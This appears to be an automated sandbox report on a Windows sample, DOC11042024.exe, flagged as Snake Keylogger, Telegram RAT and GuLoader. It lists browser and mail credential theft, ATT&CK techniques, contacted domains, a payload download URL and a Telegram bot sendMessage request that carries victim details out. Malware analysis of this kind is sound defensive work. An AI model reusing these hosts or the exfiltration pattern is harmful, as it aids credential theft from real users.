          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405EC4

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1128, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1128, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1128, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		1
          OS Credential Dumping          		3
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API          		1
          Registry Run Keys / Startup Folder          		311
          Process Injection          		1
          Software Packing          		LSASS Memory14
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		Security Account Manager111
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Masquerading          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
          Virtualization/Sandbox Evasion          		LSA Secrets131
          Virtualization/Sandbox Evasion          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
          Process Injection          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548204 Sample: DOC11042024.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 3 other IPs or domains 2->38 46 Found malware configuration 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 Yara detected GuLoader 2->50 56 3 other signatures 2->56 8 DOC11042024.exe 2 19 2->8         started        signatures3 52 Tries to detect the country of the analysis system (by using the IP) 34->52 54 Uses the Telegram API (likely for C&C communication) 36->54 process4 file5 22 C:\Users\user\AppData\...\Isbjergs.Krs, ASCII 8->22 dropped 58 Suspicious powershell command line found 8->58 12 powershell.exe 27 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\DOC11042024.exe, PE32 12->24 dropped 26 C:\Users\...\DOC11042024.exe:Zone.Identifier, ASCII 12->26 dropped 60 Early bird code injection technique detected 12->60 62 Writes to foreign memory regions 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 66 3 other signatures 12->66 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 49901 TELEGRAMRU United Kingdom 16->28 30 reallyfreegeoip.org 188.114.96.3, 443, 49811, 49819 CLOUDFLARENETUS European Union 16->30 32 2 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 44 Hides threads from debuggers 16->44 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DOC11042024.exe5%ReversingLabs
          DOC11042024.exe19%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe5%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          vyebetsh.sa.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          http://checkip.dyndns.org0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://reallyfreegeoip.org0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          vyebetsh.sa.com
          		141.98.10.40
          		truefalseunknown
          reallyfreegeoip.org
          		188.114.96.3
          		truetrue
            		unknown
            api.telegram.org
            		149.154.167.220
            		truetrue
              		unknown
              checkip.dyndns.com
              		193.122.6.168
              		truefalse
                		unknown
                checkip.dyndns.org
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://reallyfreegeoip.org/xml/173.254.250.69false
                    		unknown
                    http://vyebetsh.sa.com/nMcrGmhC252.binfalse
                      		unknown
                      http://checkip.dyndns.org/false
                      • URL Reputation: safe
                      		unknown
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2004/11/2024%20/%2016:35:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.office.com/msiexec.exe, 00000005.00000002.3282055116.0000000021E03000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgmsiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/botmsiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20amsiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://checkip.dyndns.orgmsiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.office.com/lBjqmsiexec.exe, 00000005.00000002.3282055116.0000000021DFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://nsis.sf.net/NSIS_ErrorErrorDOC11042024.exe, DOC11042024.exe.2.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000005.00000002.3282055116.0000000021DD2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021E03000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021DC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.ecosia.org/newtab/msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://varders.kozow.com:8081msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://aborters.duckdns.org:8081msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://reallyfreegeoip.org/xml/173.254.250.69$msiexec.exe, 00000005.00000002.3282055116.0000000021C88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://anotherarmy.dns.army:8081msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://aka.ms/pscore6lBjqpowershell.exe, 00000002.00000002.2324911323.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021C5E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2324911323.0000000004691000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://chrome.google.com/webstore?hl=enlBjqmsiexec.exe, 00000005.00000002.3282055116.0000000021DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://reallyfreegeoip.org/xml/msiexec.exe, 00000005.00000002.3282055116.0000000021C5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        		api.telegram.orgUnited Kingdom
                                                        		62041TELEGRAMRUtrue
                                                        193.122.6.168
                                                        		checkip.dyndns.comUnited States
                                                        		31898ORACLE-BMC-31898USfalse
                                                        188.114.96.3
                                                        		reallyfreegeoip.orgEuropean Union
                                                        		13335CLOUDFLARENETUStrue
                                                        141.98.10.40
                                                        		vyebetsh.sa.comLithuania
                                                        		209605HOSTBALTICLTfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1548204
                                                        Start date and time:2024-11-04 07:12:12 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 40s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:7
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:DOC11042024.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@6/15@4/4
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 90%
                                                        • Number of executed functions: 185
                                                        • Number of non-executed functions: 58
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 1372 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        01:13:03API Interceptor36x Sleep call for process: powershell.exe modified
                                                        01:13:41API Interceptor333950x Sleep call for process: msiexec.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        149.154.167.220Dbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            Request For Quotation RFQ1310.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              Quote.exeGet hashmaliciousMassLogger RATBrowse
                                                                SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exeGet hashmaliciousMicroClipBrowse
                                                                  file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      Payment info.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          Quotation Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            193.122.6.168Dbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            z79PROFORMAINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • checkip.dyndns.org/
                                                                            2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Quotation Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • checkip.dyndns.org/
                                                                            PROFORMA FATURA pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            188.114.96.3PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                                            • e3z1.shop/HT341/index.php
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                            • documentreviewone.com/notes/document.exe
                                                                            zK3150CS8q.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • piratekings.online/tmp/index.php
                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • piratekings.online/tmp/index.php
                                                                            Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • filetransfer.io/data-package/XimZ5Qu2/download
                                                                            DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                            • www.vrxlzluy.shop/o91n/
                                                                            rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • filetransfer.io/data-package/8Koz7PwT/download
                                                                            PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                            • e3z1.shop/HT341/index.php
                                                                            NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                            • www.timizoasisey.shop/3p0l/
                                                                            FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                            • www.bayarcepat19.click/5hcm/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            reallyfreegeoip.orgDbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            Request For Quotation RFQ1310.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            Quote.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            Payment info.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.97.3
                                                                            checkip.dyndns.comDbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 132.226.8.169
                                                                            Request For Quotation RFQ1310.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 158.101.44.242
                                                                            Quote.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 193.122.130.0
                                                                            Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            Payment info.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 193.122.130.0
                                                                            api.telegram.orgDbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            Request For Quotation RFQ1310.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            Quote.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exeGet hashmaliciousMicroClipBrowse
                                                                            • 149.154.167.220
                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Payment info.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Quotation Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ORACLE-BMC-31898USDbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                            • 130.61.142.133
                                                                            Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                            • 152.67.112.12
                                                                            Request For Quotation RFQ1310.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 158.101.44.242
                                                                            SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exeGet hashmaliciousUnknownBrowse
                                                                            • 132.145.248.22
                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 193.122.130.0
                                                                            SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            Payment info.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 158.101.44.242
                                                                            TELEGRAMRUDbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            LauncherV3.31.exeGet hashmaliciousStealc, VidarBrowse
                                                                            • 149.154.167.99
                                                                            TLl24p3e6q.exeGet hashmaliciousStealc, VidarBrowse
                                                                            • 149.154.167.99
                                                                            Request For Quotation RFQ1310.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            Quote.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 149.154.167.220
